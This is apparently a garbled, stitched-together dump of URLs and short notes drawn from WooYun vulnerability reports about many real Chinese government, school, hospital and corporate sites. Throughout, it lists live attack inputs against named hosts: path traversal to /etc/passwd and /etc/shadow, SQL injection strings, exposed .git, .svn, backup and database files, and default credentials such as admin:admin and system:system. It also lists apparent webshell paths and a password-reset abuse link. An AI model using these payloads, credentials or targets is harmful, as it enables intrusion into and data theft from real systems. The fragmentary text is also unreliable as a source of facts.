http://www.wooyun.org/bugs/wooyun-2010-089573 http://**.**.**/ http://ms.bistu.edu.cn/wp-login.php?action=rp&key=[ms.wp_users.user_activation_key]&login=admin http://**.**.**/mweom/logon.ac http://barcode.bgp.com.cn:8090/login cn:8090 http://barcode.bgp.com.cn:8090 http://api1.fun.tv/ajax/get_mobile_vcode/电话号码/reset_password http://www.fun.tv/account/password/set?isajax=1 http://www.fun.tv/account/password/setbymobile http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd http://www.w3.org/1999/xhtml http://tcl.com/About/huameng_detail.html?id=256 http://kxkw.staff.xdf.cn:80/Course-suzhi-course_category_id-74* http://down.chinaz.com/soft/30300.htm inurl:showprojects.asp?id= http://xf.shidaosoloon.com/chinese/projects/showprojects.asp?ID=715 http://www.mehndimadness.com/showprojects.asp?projectid=3 http://www.dywenshi.com/showprojects.asp?id=23 http://www.qd-fm.com/showprojects.asp?i=16658 
http://www.0712weixiu.com/showprojects.asp?id=21 http://www.lyyd.com//xydata/xycms.mdb http://www.lylantianjx.com//xydata/xycms.mdb http://www.lyhbsh.com//xydata/xycms.mdb http://www.sdyndcjx.com//xydata/xycms.mdb http://sdlysfs.com//xydata/xycms.mdb www.jlkxxx.com www.rtxnet.com www.lbcsw.com www.cp368.com www.sihongren.com www.wa118114.com www.mylovedz.com www.zmdbxw.com www.rtxnet.com www.qzw0595.com www.hykm888.cn www.baixinxi.com www.anji365.cn www.jieemall.com www.ooovv.com http://my.xcar.com.cn/set/address.php http://my.xcar.com.cn:80/set/address.php?action=add http://my.xcar.com.cn:80/set/account.php?action=profile http://"/ http://demo.lebi.cn/ajax/imageuploadone.aspx http://psy.ruc.edu.cn/facultyinfo.php?id=14 VERSION:1.2.3 http://zhhy.nbse.net.cn/ShipSuiteEB/login.htm http://www.venshop.com/download/ www.cccf.net.cn/center/pages/download.jsppath=center/pages/download.jsp&name=download.jsp http://www.cccf.net.cn/center/pages/download.jsp?path=centerNew/pages/complaint.jsp&name=complaint.jsp www.cccf.net.cn/getCenterIndex.do www.ptlove.net.cn/series_pro_detail.php?id=16&pid=151 http://www.bzga.gov.cn/cmcx/ http://222.240.176.99/gbs/ www.tzpolice.gov.cn/getjwj.phpop=1 http://222.190.123.50:8001/ydzf/Web/Login.htm http://222.190.123.50:8001 http://113.134.202.67:8000/ http://113.134.202.67:8000/CheckLogin.aspx http://breadtrip.com/downloads/ MD5:DA:6A:20:C1:FB:50:3A:3C:E9:BA:79:6A:5F:61:83:BD SHA1:4D:69:5F:DA:C5:FC:B2:FB:36:0E:28:2B:09:E6:94:B4:C6:92:E7:FB https://github.com/yuanchenglu/LinuxInitConfig/blob/364269f80b1f359bcd674b91bf47f4020f58f3ad/account.c http://www.cmyl.edu.hk/php/webinfo/show.php?id=2 http://www.cmyl.edu.hk/php/calendar/calendar.php?month[]=111,得到路径/home/www/kindergarten/cmyl/php/calendar/calendar.php http://www.cmyl.edu.hk/php/webinfo/fdpic.php?picpath=updatepic/uploads/20130210000952175.JPG。 http://www.cmyl.edu.hk/php//updatepic/uploads/20130210000952175.JPG可看到图片。 http://222.243.207.19:8086/ http://222.243.207.19:8086/frame/ 
http://www.chinapnr.com/questionnaire.zip file:/D:/xampps/htdocs/questionnaire/result.php file:/D:/xampps/htdocs/questionnaire/questionnaire.php file:/D:/xampps/htdocs/questionnaire/lib/tools.php file:/D:/xampps/htdocs/questionnaire/js/area.js http://www.nysykfk.com/interflow_show.php?id=150 www.boco.com.cn/boco/cn/news_0.asp?id=1 www.boco.com.cn/boco/cn/xt_left.asp?comp=1 www.boco.com.cn/boco/cn/xt_news.asp?id=1 http://www.cae.com.cn/Default.aspx http://www.cae.com.cn/webfunction/customerinquiries/CusLogin.aspx http://www.cae.com.cn/webfunction/customerinquiries/CusLogin.aspx http://www.cae.com.cn/Default.aspx http://www.cae.com.cn/webfunction/customerinquiries/CusLogin.aspx http://www.cae.com.cn/webfunction/customerinquiries/CusLogin.aspx http://221.1.104.11:8011/OperateCertify/FamilyApplyAudit.aspx?id= http://221.2.171.59:8300/OperateCertify/FamilyApplyAudit.aspx?id= http://demo.inongyou.cn/OperateCertify/FamilyApplyAudit.aspx?id= http://rctdlz.cn/OperateCertify/FamilyApplyAudit.aspx?id= http://60.2.214.118:8088/OperateCertify/FamilyApplyAudit.aspx?id= http://121.17.2.52/OperateCertify/FamilyApplyAudit.aspx?id= http://61.186.154.210:8088/OperateCertify/FamilyApplyAudit.aspx?id= http://123.129.52.134/Login.aspx http://www.lygcs.gov.cn/xz.asp?classid=20 http://news.sohu.com/s2015/0010/s409336743/index.shtml http://yqgjzgs.com/gj/route_suggestion.asp?q=1 http://sci.cqvip.com//periodical/list.aspx?factor_max=e&factor_min=e&order=\&QKType=sciences&sciences=e http://www.lncy.lss.gov.cn/xzzq/xzzq.asp?id=1 http://www.venshop.com/download/ http://iss.ruc.edu.cn/voice_info.php?id=13 http://iss.ruc.edu.cn/events_info.php?id=21 http://cloudcomputing.ruc.edu.cn/Chinese/onlineresource.jsp?id=3 http://wjw.jining.gov.cn/admin/login.asp http://地址/..%5c..%5c..%5c/windows/win.ini http://**.**.**/jwgkweb/index!index.do http://open.sm.cn/index.php/open/qualify?cat_id=2 http://open.sm.cn/index.php/open/qualify?cat_id=2 www.ppkoo.com/server/upload.zip http://mrtg.ruc.edu.cn 
http://222.174.54.118:8088/ http://222.174.54.118:8088 password:bakuser1122 http://union.zhuna.cn/dujia/index.php?znsearch=&txtCity=%E5%8C%97%E4%BA%AC&cityId=0101&key=s gsi.big.ac.cn/news/bene/?id=1 http://118.193.211.239/c.html",故跟踪了一下网站看能不能拿到一些有用的信息。 http://www.travel.citic.com/shipList.jsp?shipid=1620 http://www.travel.citic.com/route_detail.jsp?routeid=201411240952 http://www.travel.citic.com/orderSuccess.jsp?routeid=201411240952 http://www.travel.citic.com/company.jsp?docid=001 http://www.travel.citic.com/enterprise_news_details.jsp?docid=6048 https://login.alibaba-inc.com登录是没什么用啦 http://www.anymacro.com/index.htm https://115.25.86.234/ https://115.25.86.236/ https://115.25.86.233/ https://115.25.86.235/ http://h.bilibili.com:80/.git/config http://www.rsc.zjut.edu.cn/rczp_detail.asp?id= https://xls.feiniu.com http://www.nysy.com.cn/qzly/qzlxlist.aspx?type=150 http://ecard.sdca.edu.cn//Index_main.aspx?NewsClassCode=1 http://sac.cumt.edu.cn/list.aspx?id=85 http://www.rucsau.com/index.php/site/viewText?id=153&checkId=152 istc.njtech.edu.cn/istc/index.php?controller=bookings&action=ajaxoption&id=1 https://sslvpn.faw.com.cn https://sslvpn.faw.com.cn/dana-na/auth/url_default/welcome.cgi http://222.73.228.40:8080/manager/clustermgr/login.jsp# http://tjdt.tbmmis.com/Login.aspx http://xls.feiniu.com/web/signin cloudcomputing.ruc.edu.cn/Chinese/problempage.jsp?id=1005 http://122.224.254.122:8000/Frame/Login.htm直接填写验证码可以进入后台 http://www.jiaofan.com/page.php?id=-1%20or%2018%20%3d%2016 http://www.xftech.com.cn/products.php?typeid=59&id=529 http://218.246.111.196:8088/ http://218.246.111.196:8088/UploadFile/635617024736037149.aspx http://www.casicedu.cn/front/info.php?infotype=1 http://jd.vsa.com.cn/seller_login.shtml http://jd.vsa.com.cn/test.txt https://mail.shenma-inc.com/ http://**.**.**/vote/admin/images/left/16683/index.html http://220.163.118.108/login_init.action http://www.ncwsj.cn/ http://www.xjjdls.com/sug.asp?info_kind=005 
http://iss.ruc.edu.cn/events_info.php?id=20 http://111.30.45.123:8080/ http://111.30.45.123:8080/Index/Index)以外,其他页面似乎没有进行是否登录的判断。 http://111.30.45.123:8080/Index/User http://www.bld365.com/ http://www.bld365.com/ajax/getMemberInfo.action?temp=1426082592354 http://gyxfy.tcl.com/ http://gyxfy.tcl.com/admin/ Tel:027-87808981、87211102 http://218.29.94.8/etmdcp/为例 http://218.29.94.8/etmdcp/ http://admin.ibeiliao.com/.svn/entries http://admin.ibeiliao.com/printenv.cgi https://www.bugscan.net/ http://jftest.haier.com/manager/html admin:admin http://jftest.haier.com/wc2/cwd.jsp http://www.sj-hospital.org/ http://ihangjing.com/case/caselist.aspx www.4007123123.com www.faneat.com www.vtaoshi.com www.zainachi.com items:1:number items:1:age items:1:evicted items:1:evicted_nonzero items:1:evicted_time items:1:outofmemory items:1:tailrepairs items:1:reclaimed items:1:expired_unfetched items:1:evicted_unfetched items:2:number items:2:age items:2:evicted items:2:evicted_nonzero items:2:evicted_time items:2:outofmemory items:2:tailrepairs items:2:reclaimed items:2:expired_unfetched items:2:evicted_unfetched www.cqcgs.gov.cn/statistics/articleaction.jsparticleid=11563&articlename=%D6%D8%C7%EC%CA%D0%B9%AB%B0%B2%BE%D6%BD%BB%CD%A8%B9%DC%C0%ED%BE%D6%B3%B5%C1%BE%B9%DC%C0%ED%CB%F9%B9%D9%B7%BD%CE%A2%D0%C5 http://**.**.**/statistics/articleaction.jsparticleid=14300&articlename=%C4%C3%C1%CB%BC%DD%D5%D5%BB%B9%B2%BB%BB%E1%CD%A3%B3%B5%C8%EB%BF%E2%A3%BF%BF%B4%BF%B4%A1%B0%C0%EESIR%A1%B1%B5%C4%CD%A3%B3%B5%B9%A5%C2%D4_ http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** https://cai.99bill.com https://pof.99bill.com https://ns5.99bill.com https://ns4.99bill.com https://bta.99bill.com https://maintenance2.99bill.com htp://sandbox.99bill.com:2443 http://sandbox.99bill.com:8002 http://sandbox.99bill.com:8445 http://appmaker.sinaapp.com/poc/com.letv.www/1.htm 
falsh:http://player.letvcdn.com/p/201501/30/11/StorageLetvPlayer.swf http://www.ycu.edu.cn/website/ intitle:MWMS4 http://42.156.166.30/cdn/index.php site:airchina.com.cn http://mp.airchina.com.cn:38443/MAGLIBv0.6/magserver/local/log/mag.log.2012-10-12.txt http://mp.airchina.com.cn:38443/MAGLIBv0.6/magserver/local/log/mag.log.2013-12-15.txt http://ip.9you.com/ http://lib.hrbeu.edu.cn/x/sy_tsjk_jj_yjfk.asp?id=243 http://lib.hrbeu.edu.cn/x/sy_tsjk_jj_yjfk.asp?id=243 http://sqlmap.org http://mall.95572.com/ http://mall.95572.com/index.php?act=member&op=show_order&order_id=18331 http://mall.95572.com/index.php?act=member&op=address&type=edit&id=5224 http://service.ltpop.gov.cn/Services.shtml http://service.hsrk.gov.cn/Services.shtml http://service.sqjs.gov.cn/Services.shtml http://service.zzxpop.gov.cn/Services.shtml http://service.ltjsj.gov.cn/Services.shtml http://service.zyxpop.gov.cn/Services.shtml http://service.akpop.gov.cn/Services.shtml http://service.zyxpop.gov.cn http://60.208.116.173:81/sjyoa/,扫描发现/general/二级目录下 http://60.208.116.173:81/sjyoa/general/说明.txt文件记载了部分目录地址,进一步扫描发现http://60.208.116.173:81/sjyoa/general/xtm/user/页面可增加、修改系统用户信息 http://60.208.116.173:81/sjyoa/general/zhxxxt/workersHome/zhxxxtGetDepartmentAction.action页面允许上传图片, http://192.168.2.99/bookReader.php http://elearning.corp.elong.com/ http://gz.oa.xdf.cn/mypromise/info.php?id=070828 http://219.136.133.169:10118/jpglweb/login.shtml http://219.136.133.169:10118/jpglweb/test.txt http://gaea.staff.xdf.cn/gaea/index.php/service/contract?sid=108&id=22&pid=69&type=3 http://gaea.staff.xdf.cn/gaea/index.php/service/products?sid=26&id=5 http://gaea.staff.xdf.cn/gaea/index.php/service/productPic?sid=108&id=22&pid=74&type=1 http://gaea.staff.xdf.cn/gaea/index.php/service/productInfo?sid=340&id=153&pid=76&type=2http://gaea.staff.xdf.cn/gaea/index.php/case/caseStudent?cid=65796&id=3&sid=83 http://gz-xinyuan.com/,先注册个会员 www.lnlyadsj.com http://www.lnlyadsj.com http://219.137.250.116:8082/ 
https://sandbox.99bill.com http://sandbox.99bill.com:9080 http://gdtj.chinasarft.gov.cn/chinasarftstainfofabu/LegendMap.aspx?areacode=000000&height=&id=1&width= http://se-office.ruc.edu.cn/cn/index.php?do=list&channelid=4094 http://scc.cau.edu.cn/scc/common/ http://zhushou.2345.com/index.php?c=boucheCheck&d=listFeedback&check=2&page=3 http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://www.haczrc.com/myadmin/ http://www.sarft.gov.cn//WEB-INF/web.xml http://dsj.sarft.gov.cn//invoker/JMXInvokerServlet https://wx.abchina.com/WebSite/GetCreditBillListAct.ebf?openId=oHFX_jr_vrzeWhYD5tGWxNNtdug8&appId=wx51fdf61c0de4ab0b https://wx.abchina.com/WebSite/GetCreditBillTransInfoAct.ebf http://wx.api.dawenmedia.com/wxdw/register/bride http://wx.api.dawenmedia.com https://account.aliyun.com/login/login.htm?spm=a1z5k.7633538.0.0.DQgb7h&oauth_callback=https%3A%2F%2Fpassport.alibaba.com%2Fac%2Fto_iv.htm%3FfromSite%3D6 http://www.zzcrcgas.com http://218.28.4.60:8088/anquan_unit/list.aspx?sid=531 http://218.28.4.60:8088/news/download.aspx?filename=../../Fnews/download.aspx http://218.28.4.60:8088/anquan_unit/download.aspx?filename=../../anquan_unit/download.aspx http://www.zzcrcgas.com/page/form/zxjf.jsp http://ric.whu.edu.cn/Web/Login.aspx http://www.sunlands.com http://img.pipi.cn/imgupload/clientwww3/201502/03/20150203162921_744.jpg http://bms.ggjgnh.cn/loginAction.action www.hao123.com/?tn=94472661_hao_pg www.3600.com/?src=lm&ls=n431da8d38f www.2345.com/?k34511517 www.duba.com/?un_449343_1173 
www.88488.com/?sign=rec|www.hao123.com/?tn=94472661_hao_pg hao123www.hao123.com/?tn=94472661_hao_pg|www.hao123.com/favicon.ico|0 gc.pipi.cn/desktop/zsglw1.html|afm.pipi.cn/pfup/zsg.ico|0 gc.pipi.cn/desktop/hazg1.html|www.pipi.cn/pfup/hazg2.ico|0 http://www.cyd818.com http://www.cyd818.com/abcmobile1/getCityByAbc_typeAndProvince.action https://github.com/yunlongmain/test/blob/a89d2c10603a155c62ed3dd6ae0385238813bc02/ci/application/controllers/mail.php http://kuaidadi.com/tax123_db_last.sql http://kuaidadi.com/admin/login.html http://119.147.224.147:8090/ www.szatlas.com.cn www.chinahzdani.com www.haotui.net www.fzcailiao.com http://pgzy.zjzs.net:8011/exam/gaokao2014/cjcx.aspx settings.asmx/getquestion http://210.21.119.232:8080/ http://bbs.ttyfund.com/uc_server/data/config.inc.php.bak http://user.ln.vnet.cn/aaa/portal/login.shtml http://user.ln.vnet.cn/aaa/test.txt http://oa.7651.com/ http://mp.toutiao.com http://www.oppo.com.cn/ http://oa.oppo.com.cn/xampp/ http://oa.oppo.com.cn/phpmyadmin/未授权访问 http://www.999netsafe.com:8010/fwjs/default/detail.jsp?sortid=1&fwjsid=8 http://www.999netsafe.com/news/default/defaultdetail.jsp?sortid=1&newsid=590 http://www.999netsafe.com/news/default/defaultdetail.jsp?sortid=1&newsid=590 http://www.999netsafe.com/news/default/defaultdetail.jsp?sortid=1&newsid=590 http://hbbsk.hbu.cn/tpi_18/sysasp/share/displaydatabase.asp?dbid=0&submittype=update&sysid=100 http://202.121.127.18/tpi_3/sysasp/share/displaydatabase.asp?dbid=0&submittype=update&sysid=100 http://202.120.82.49/tpi_8/sysasp/share/displaydatabase.asp?dbid=0&submittype=update&sysid=2000 http://oa.tjtc.edu.cn/zfoa/main.action http://58.49.91.221/zfoa/index.do http://oa.xynun.edu.cn/zfoa/index.do http://oa.zbnc.edu.cn/zfoa/index.do http://58.49.91.221/zfoa/index.do http://58.42.245.178/zfoa/index.do http://222.17.128.11:8065/zfoa/index.do http://220.201.218.10:8018 http://oa.nepu.edu.cn http://218.197.8.19:8018 http://218.26.1.82:13382/admin/login.jsp 
http://218.26.1.82:13382/admin/purview/user/inputRegister.action http://touch.acer.com.cn/web.rar http://www.piaoyou.org/ http://www.piaoyou.org/web.htm http://demo.piaoyou.org http://www.pekpiaoyou.com/case.htm http://jn.66wch.com/MemberToLoginIgnore.action http://xx.66wch.com/MemberToLoginIgnore.action http://jn.66wch.com/MemberToLoginIgnore.action http://sh.66wch.com/MemberToLoginIgnore.action http://gd.66wch.com/MemberToLoginIgnore.action http://zj.66wch.com/MemberToLoginIgnore.action http://gz.66wch.com/MemberToLoginIgnore.action http://ln.66wch.com/MemberToLoginIgnore.action http://jn.84ke.com:8080/bus/showLine.action http://119.145.71.200/zy/login.shtml http://www.xcrc.gov.cn/News/ShowNews.asp?ID=1938 http://0745.hhly.gov.cn/eat.php?menuId=34 http://0745.hhly.gov.cn/live.php?menuId=35 http://0745.hhly.gov.cn/travel.php?menuId=39 http://0745.hhly.gov.cn/shop.php?menuId=37 http://0745.hhly.gov.cn/joy.php?menuId=36 http://0745.hhly.gov.cn/travel_xx.php?menuId=60 http://0745.hhly.gov.cn/newsTj.php?menuId=31 http://0745.hhly.gov.cn/panoramic.php?menuId=63 http://0745.hhly.gov.cn/live_xx.php?menuId=68 http://0745.hhly.gov.cn/eat_xx.php?menuId=43 http://0745.hhly.gov.cn/newsTj_xx.php?menuId=66 http://0745.hhly.gov.cn/shop_xx.php?menuId=55 http://0745.hhly.gov.cn/joy_xx.php?menuId=50 http://0745.hhly.gov.cn/news.php?menuId=4 http://0745.hhly.gov.cn/news_xx.php?menuId=5 http://cas.nwpu.edu.cn/cas/login?service=http%3A%2F%2Fportal.nwpu.edu.cn%2Fdcp%2Findex.jsp http://**.**.**/login.htm http://**.**.**/ http://v2014.rccms.com/person/resumelist.php?t=sideline&pnum= https://emts-web.huawei.com/emsweb/loginfrm.aspx http://www.7277.net/ http://www.xiangquanwan.net/manager/login.php http://www.nbrkb.net/manager/login.php http://www.sep-logistics.com/manager/login.php http://www.jade-glory.com/manager/login.php http://www.fynb0919.com/manager/login.php http://scrm.moxian.com/sys/memberAuthentication.mo 
http://www.smartcome.com/forum.php?mod=viewthread&tid=1%20union/*11%20*1*/select%201%20from%20dual--%201 http://211.144.217.230/elife/ http://t9.go2oa.com/t9/core/frame/webos/index.jsp http://passport.iqiyi.com/user/login.php http://t9.go2oa.com/t9/core/frame/webos/index.jsp http://t9.go2oa.com/t9/t9/core/funcs/email/act/T9EmailBoxAct/isBoxNameExist.act http://www.sccin.com.cn/AreaInfo/DownloadCenter/List.aspx?CategoryId=XZZX_CYBG http://msg.csdn.net/letters/send_message?receiver=jahnng&body=123 http://msg.csdn.net/letters/send_message?receiver=dahaozhao1&body=CSRF http://202.206.20.36/ http://**.**.**/Admin/login.jsp http://wooyun.org/bugs/wooyun-2015-097236/trace/2a26b4cb9b1a8797259f3b626e816abf http://www.tixa.com//resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://www.tixa.com//resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/shadow http://www.tixa.com//resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/httpd/conf/httpd.conf http://www.tgztb.gov.cn/admin/login.aspx http://58.215.138.213/phpmyadmin http://58.215.138.213/p.php root:root http://esales.sdo.com/ http://esales.sdo.com/Register/MobileRegister.aspx http://www.ciwong.com/xiyou/todaystar/gettodays http://58.215.138.183:9200/ http://58.215.138.183:8000/ http://www.jxnotary.org/showinfo.asp?id=288 http://wooyun.org/bugs/wooyun-2010-097032 http://zswin.cn/artc/144.html http://wooyun.org/bugs/wooyun-2010-097032 http://zswin.cn/artc/149.html http://www.0755sx.com/admin/login.asp www.jljj.gov.cn/admin/cms/login.do_ www.jljj.cn&x=76&y=1 http://www.piaoyou.org/ http://www.piaoyou.org/web.htm http://demo.piaoyou.org http://www.piaoyou.org/ http://www.piaoyou.org/web.htm http://demo.piaoyou.org http://www.pekpiaoyou.com/case.htm http://www.piaoyou.org/ http://www.piaoyou.org/web.htm http://demo.piaoyou.org http://www.pekpiaoyou.com/case.htm http://ehr.cofco.com/ http://down.chinaz.com/soft/25595.htm) inurl:zy.asp?m= http://jw.hnsfjy.net/ http://www.gycc.net/sjjd/ 
http://210.26.80.118/jpkc/shyj/ http://tw.lmu.cn/ http://www1.tyust.edu.cn/yuanxi/jsjg/ http://61.167.199.246/jmc/ http://jw.sasu.cn/ http://zx.sdningjin.gov.cn/ http://219.139.35.98:98/ http://vod.hy17173.com/film_new/ http://www.gsasny.com/ http://www.cnseay.com/3237/ http://www.maimaicha.com/api.php http://www.maimaicha.com/api.php http://www.dgrb.cn/uprove.aspx?code=529975924 system:system,后台不显示这个账户,试了搜索来的10个,全部中招。 system:system.用户大多是edu.cn,甚至包括ac.cn中科院。 http://www.piaoyou.org/ http://www.piaoyou.org/web.htm http://demo.piaoyou.org http://www.pekpiaoyou.com/case.htm http://www.piaoyou.org/ http://www.piaoyou.org/web.htm http://demo.piaoyou.org http://www.pekpiaoyou.com/case.htm http://www.piaoyou.org/ http://www.piaoyou.org/web.htm http://demo.piaoyou.org http://www.pekpiaoyou.com/case.htm http://**.**.** http://**.**.**/f.txt_ http://**.**.**/f.txt_ http://**.**.**/f.txt_ http://**.**.**/f.txt http://www.xusoft09.cn http://www.aspjzy.com/Viewurl-12391.html) inurl:ReadBigClassmb.asp?id= http://www.ounengbei.com/WriteBook.asp http://www.hkhotel160.com/yuebing/WriteBook.asp http://www.shpsjj.com//WriteBook.asp http://cp01.cn//WriteBook.asp http://www.huaxiaxh.com//WriteBook.asp http://www.liyuanganguang.com//WriteBook.asp http://www.ybcnhd.com//WriteBook.asp http://www.kangjiayuan.cn//WriteBook.asp http://www.chuangjiexiaosha.com/WriteBook.asp http://www.szjpl168.com//WriteBook.asp http://www.5igwk.com/WriteBook.asp http://net.zetronic.com.cn/NetSMS/UpdateNetPassword.aspx?IsPopWnd=N&CertNo=要修改密码的身份证号&Tel=手机号码&IsStrongBindArea=N&IsNormalPwd=0&UnitCode=网吧编号 http://www.chinasunsoft.net/ inurl:7001/sanzi/ http://221.2.103.114:7001/sanzi/login.action http://218.92.50.202:7001/sanzi/llogin.action http://120.202.47.30:7001/sanzi/login.action http://124.228.32.53:7001/sanzi/login.action http://119.184.124.58:7001/sanzi/login.action http://121.10.6.181/ http://book.ifeng.com/ http://v.book.ifeng.com/shelf.htm?id=3034782 
http://ser.read.ifeng.com/traffics/add_click.htm?b=3034782 http://safe.2345.com http://182.150.21.177:8080/jttgkpt/frame/loginAction!login.action https://www.lngmxx.com/ https://60.13.3.21/ https://58.42.250.234/ https://120.195.49.238/ https://124.163.249.126/ http://ucstar.jxlife.com.cn:9090/login.jsp http://ucstar.jxlife.com.cn:9090/uploadfile?istrade=istrade&filename=../../../../../etc/passwd http://ucstar.jxlife.com.cn:9090/uploadfile?istrade=istrade&filename=../../../../../etc/services www1.open.edu.cn/ycjy/jishu.php?id=195 https://github.com/Hankaln/moying/blob/68fa5c2ef88c68d1988bd1ad63ca3a0874219d4d/config/config.php http://bbs.eral.com.cn/space/ispace_friend.php?userid=181603 http://bbs.eral.com.cn/space/ispace_active.php?userid=181603 http://bbs.eral.com.cn/space/ispace.php?userid=181603 http://bbs.eral.com.cn/space/ispace_group.php?userid=181603 http://bbs.eral.com.cn/space/ispace_album.php?userid=181603 http://bbs.eral.com.cn/space/ispace_active_vote.phpuserid=181603&id=2697&actid=6 http://www.piaoyou.org/ http://www.piaoyou.org/web.htm http://demo.piaoyou.org http://www.pekpiaoyou.com/case.htm http://www.hsufuchifoods.com/Contact.aspx?MenuID=001008001 http://sl.zhuna.cn/可以爆破用户名,首先爆破出chenjun用户存在,登陆密码为弱口令123456 http://skyrole.cn/ index.php/home/index/detail_meet system:system进入后台。 system:system这种。也有12+数字字母符号密码。。。。 http://www.51baishi.com/users!login.action http://www.51baishi.com/test.txt http://demo.51able.com http://www.piaoyou.org/ http://www.piaoyou.org/web.htm http://demo.piaoyou.org http://www.pekpiaoyou.com/case.htm http://www.interotc.cn/lm/tzjDetail.do?id=700004 user:root pass:123456 http://218.106.175.241:9090/phpmyadmin/ url:http://www.wzstats.gov.cn:9089/ http://www.wzstats.gov.cn:9089/search.asp?VTI-GROUP=0¤tpage=1&look_for=%27&VTI-GROUP=1&which=0&imageField.x=28&imageField.y=11 VERSION:1.2.3 http://www.hhhtgzc.com/dyggg.asp?id=10 http://sggzccn.cnc506.000pc.net/dyggg.asp?id=11 http://www.kqgzc.com/dyggg.asp?id=1 
http://www.erdostjgzc.com/dyggg.asp?id=40 http://www.kqgzc.com/dyggg.asp?id=40 http://117.79.80.23:8000使用了第三方程序,且存在注入。 http://117.79.80.23:8000/index.php?edition-compare http://bbs.gfan.com http://mail.chdmy.com.cn/ http://gaea.staff.xdf.cn/gaea/index.php/Hk/hkCase?sid=350&id=12&zy=Teaching%20English%20to%20Speakers%20of%20Other%20Languages http://www.donvieware.com:8085/servlet/vodsys.MovieInfor?id=950 http://125.88.124.147:8085/servlet/vodsys.MovieInfor?id=1074 http://121.10.252.178:8085/servlet/vodsys.MovieInfor?id=1014 http://61.189.240.78:8085/servlet/vodsys.MovieInfor?id=2659 http://www.donvieware.com:8085/servlet/vodsys.MovieInfor http://sqlmap.org http://moa.chinamobile.com/download/scripts/wapdetail2.php?project_code=gd&PF_CODE=01010400 http://114.251.196.23/web.rar http://www.sidp.gov.cn/2009/0708/4551.html http://stats.sidp.gov.cn/login.php http://project.sidp.gov.cn/login.php http://stats.sidp.gov.cn/login1.php http://202.85.223.10/进入瞬间浏览器的标题会看到阳光雨露helpdesk系统的字样有木有,不过之后就只显示helpdesk系统登录了 http://202.85.223.10:8080/jmx-console/居然进去了 http://homeinns.lms.ambow.net/login/userLogin.action http://www.cdtlgcxx.com:2110 http://jwmis.dzvtc.edu.cn http://jwgl.lynu.edu.cn http://220.167.53.63:81 http://jw.sxjgxy.edu.cn http://djyjw.sicau.edu.cn http:/m.rccms.com/person/index.php?t=ajax&keyword=&search_type=&btnArea=&id=963 http://t.cn/RZSiH28 http://182.151.210.179/login.jsp http://www.yishion.com.cn/detail.php?type=men&id=181 http://ehome.zte.com.cn/index.php?app=search&cate_id=1&page=1 www.cdxw.tv http://**.**.**/_ https://czk.bestpay.com.cn http://dfdjoa.dongfang.com/ user:admin pass:dongfang http://www.cae.com.cn/webfunction/webpage.aspx?nid=b12e467fdc9449fe820572fb895a94e2 https://github.com/zhaoshiling1017/JAVAMailProject/blob/6857a7f04b4573b7c132a935a4cadc122b8ece11/src/com/unicss/MailUtil.java academy.yonyou.com/ViewZsMap.aspx?order=z_products&name= http://mcm2.pc.e-health.org.cn/login/ssoLogin_login2.action http://battery.tcl.com/join.php?id=38 
http://www.tzrc.cn/uploadpic.htm http://api.passport.pptv.com/dologin.do http://zyxw.tongji.edu.cn/TJPDSYS/InfoDetail.jsp?titleID=731 http://**.**.**/_ http://124.165.218.68/Venus/login/default.asp http://www.zdsoft.net/ http://www.zdsoft.net/moreinfo.aspx?layoutTemplateId=1201&bigClassId=266571 www.tzrc.com http://yy.xmfybj.cn/123.asp http://yy.xmfybj.cn/fd.asp http://yy.xmfybj.cn/kmd.asp;kmd.txt http://yy.xmfybj.cn/asp.aspx http://yy.xmfybj.cn/feiduan.asp http://yy.xmfybj.cn/ccc.asp http://yy.xmfybj.cn/ce.asp http://www.zjqhyy.com/cms/KSLB.aspx?LMID=16 http://ywzxyy.com/cms/KSLB.ASPX?LMID=13 http://www.ksskfyy.com/cms/KSLB.aspx?LMID=916 http://www.hnzyy.cn/cms/KSLB.aspx?LMID=52 http://www.ks2y.com/cms/KSLB.aspx?LMID=25 http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://www.ks2y.com/cms/ks.aspx?wwksid=108&lb=0&lmid=25 http://www.zjkq.com.cn/cms/KS.aspx?wwksid=99&lb=0&lmid=25 http://www.fysrmyy.com/cms/ks.aspx?wwksid=210&lb=0 http://www.zjqhyy.com/cms/ks.aspx?wwksid=87&lb=0&LMID=16 http://www.hnzyy.cn/cms/ks.aspx?wwksid=300&lb=1 http://www.zjqhyy.com/cms/RY.aspx?ryid=198&ssjs=1&LMID=74 http://ywzxyy.com/cms/RY.aspx?ryid=128&ssjs=1 http://www.hnzyy.cn/cms/RY.aspx?ryid=749&ssjs=1&LMID=117 http://www.fysrmyy.com/cms/RY.aspx?ryid=633&ssjs=3 http://www.ks2y.com/cms/RY.aspx?ryid=264&ssjs=1&lmid=69 http://t1.fanwe.net http://www.zxgy.gov.cn/info/shy.asp?ClassID=22 http://www.zxgy.gov.cn/info/Admin_Index.asp http://ly.fanwe.com/ http://v2014.rccms.com http://www.ot-hs.com/index1.asp 
